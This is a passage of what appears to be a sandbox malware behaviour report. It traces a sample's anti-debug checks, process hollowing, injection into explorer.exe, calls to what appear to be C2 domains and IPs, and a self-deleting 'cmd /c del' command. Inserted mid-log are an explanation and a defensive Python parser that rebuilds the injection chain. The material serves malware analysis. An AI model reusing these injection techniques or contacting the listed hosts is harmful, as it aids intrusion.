Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03626C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03626C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03626C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03626C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0367740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0367740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0367740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035BB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035BB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035BB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035BB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035DBC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03674015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03674015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03627016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03627016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03627016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03626CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03626CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03626CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_036614FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03678CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0363B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0363B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0363B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0363B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0363B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0363B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035B849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035A9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035DF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035DF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035DF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03623884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03623884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmd.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00409B20 LdrLoadDll,
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Memory allocated: page read and write | page guard
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00886FE3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00887310 SetUnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.ice-lemon.pro
Source: C:\Windows\explorer.exe | Domain query: www.indianadogeavaxsite.site
Source: C:\Windows\explorer.exe | Domain query: www.munortiete.com
Source: C:\Windows\explorer.exe | Domain query: www.pierrot-bros.com
Source: C:\Windows\explorer.exe | Network Connect: 54.194.41.141 80
Source: C:\Windows\explorer.exe | Network Connect: 172.67.147.111 80
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 870000
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Writes to foreign memory regions
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 709008
Injects a PE file into a foreign process
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread register set: target process: 3292
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread register set: target process: 3292
Source: C:\Windows\SysWOW64\cmd.exe | Thread register set: target process: 3292
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
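Read together, the lines above describe one chain: the dropper writes a PE image (MZ header 4D5A) into a suspended RegSvcs.exe, RegSvcs.exe unmaps the image of a child cmd.exe (hollowing) and queues an APC into explorer.exe, and explorer.exe is then the process that resolves the C2 domains and opens the TCP connections, while the earlier PEB (fs:[30h]) reads and DebugPort queries are the anti-debug checks the injected code performs first. The Python below is an added example written for this page, not Joe Sandbox tooling: it parses a constructed sample made of lines copied from this report (in the raw extracted form, with the Source cell glued to the detail cell; a " | " between the cells is also accepted), rebuilds the injection chain from write/unmap/map/APC edges, and flags any injected process that talks to the network. The event names, regular expressions and output keys are this example's own assumptions.

```python
"""Reconstruct injection chain and anti-debug indicators from Joe Sandbox behaviour lines (added example)."""
import re
from collections import defaultdict

# Constructed sample input: lines copied from the report, raw extracted form.
SAMPLE = r"""
Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0363B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPort
Source: C:\Windows\explorer.exeDomain query: www.ice-lemon.pro
Source: C:\Windows\explorer.exeNetwork Connect: 54.194.41.141 80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 870000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
"""

# The Source cell always ends in ".exe"; an optional " | " separator is tolerated.
SRC_RE = re.compile(r"^Source:\s*(?P<src>.*?\.exe)\s*\|?\s*(?P<rest>\S.*)$")

# Ordered: the PE-write pattern must be tried before the plain write pattern.
EVENT_RES = [
    ("pe_write", re.compile(r"^Memory written:\s*(?P<target>.*?\.exe)\s*base:\s*[0-9A-Fa-f]+\s*value starts with:\s*4D5A")),
    ("mem_write", re.compile(r"^Memory written:\s*(?P<target>.*?\.exe)\s*base:\s*[0-9A-Fa-f]+")),
    ("hollow", re.compile(r"^Section unmapped:\s*(?P<target>.*?\.exe)\s*base address:")),
    ("map", re.compile(r"^Section loaded:\s*unknown target:\s*(?P<target>.*?\.exe)\s*protection:")),
    ("apc", re.compile(r"^Thread APC queued:\s*target process:\s*(?P<target>.*?\.exe)")),
    ("create", re.compile(r"^Process created:\s*(?P<target>.*?\.exe)\s*(?P<cmdline>.*)$")),
    ("dns", re.compile(r"^Domain query:\s*(?P<host>\S+)")),
    ("net", re.compile(r"^Network Connect:\s*(?P<ip>[\d.]+)\s+(?P<port>\d+)")),
    ("debugport", re.compile(r"^Process queried:\s*DebugPort")),
    ("peb_access", re.compile(r"^Code function:\s*(?P<func>\S+)\s+mov\s+\w+,\s*dword ptr fs:\[00000030h\]")),
]
INJECT_KINDS = {"pe_write", "mem_write", "hollow", "map", "apc"}


def basename(path):
    return path.rsplit("\\", 1)[-1]


def parse(text):
    """Return (kind, source_exe, fields) for every line matching a known event."""
    events = []
    for raw in text.splitlines():
        m = SRC_RE.match(raw.strip())
        if not m:
            continue
        for kind, rx in EVENT_RES:
            em = rx.match(m.group("rest"))
            if em:
                fields = em.groupdict()
                if "target" in fields:
                    fields["target"] = basename(fields["target"])
                events.append((kind, basename(m.group("src")), fields))
                break
    return events


def injection_chains(events, root):
    """Walk injection edges (write, hollow, map, APC) outward from the sample."""
    edges = defaultdict(set)
    for kind, src, f in events:
        if kind in INJECT_KINDS and f["target"] != src:
            edges[src].add(f["target"])
    chains, stack = [], [[root]]
    while stack:
        path = stack.pop()
        nxt = [t for t in edges[path[-1]] if t not in path]  # no cycles
        if not nxt:
            chains.append(path)
        for t in sorted(nxt):
            stack.append(path + [t])
    return sorted(chains)


def triage(text, root):
    """Summarise what the behaviour lines say about injection and evasion."""
    events = parse(text)
    injected = {f["target"] for k, _, f in events if k in INJECT_KINDS}
    peb = defaultdict(set)
    for k, src, f in events:
        if k == "peb_access":
            peb[src].add(f["func"])
    deleted = []
    for k, _, f in events:
        if k == "create":  # "cmd /c del <exe>" is the self-removal step
            m = re.search(r"\bdel\s+['\"]?(.+?\.exe)", f["cmdline"], re.I)
            if m:
                deleted.append(basename(m.group(1)))
    return {
        "chains": injection_chains(events, root),
        "injected": sorted(injected),
        # an injected system process that then talks to the network is the key indicator
        "injected_and_networking": sorted({s for k, s, _ in events if k in ("dns", "net") and s in injected}),
        "peb_access_functions": {s: len(v) for s, v in peb.items()},
        "debugport_queries": sorted({s for k, s, _ in events if k == "debugport"}),
        "self_deleted": sorted(deleted),
    }
```

Calling `triage(SAMPLE, "TPJX2QwEdXs5sTV.exe")` yields two chains ending in explorer.exe (one via RegSvcs.exe directly, one via the hollowed cmd.exe), lists explorer.exe as the injected process that performs DNS and TCP activity, counts the distinct cmd.exe functions that read fs:[30h], and records RegSvcs.exe as the binary the final cmd.exe deletes. The "Thread register set" lines are deliberately not parsed as edges because the report gives only a PID (3292) for their target, not an image name.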
Source: explorer.exe, 00000008.00000000.328066914.0000000001400000.00000002.00020000.sdmp, cmd.exe, 00000017.00000002.522213506.0000000005CA0000.00000002.00020000.sdmp | Binary or memory string: uProgram Manager
Source: explorer.exe, 00000008.00000000.328066914.0000000001400000.00000002.00020000.sdmp, cmd.exe, 00000017.00000002.522213506.0000000005CA0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000000.328066914.0000000001400000.00000002.00020000.sdmp, cmd.exe, 00000017.00000002.522213506.0000000005CA0000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000008.00000000.328066914.0000000001400000.00000002.00020000.sdmp, cmd.exe, 00000017.00000002.522213506.0000000005CA0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000008.00000000.284022944.0000000000EB8000.00000004.00000020.sdmp | Binary or memory string: ProgmanX
Source: explorer.exe, 00000008.00000000.294727832.0000000008ACF000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWndAj
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
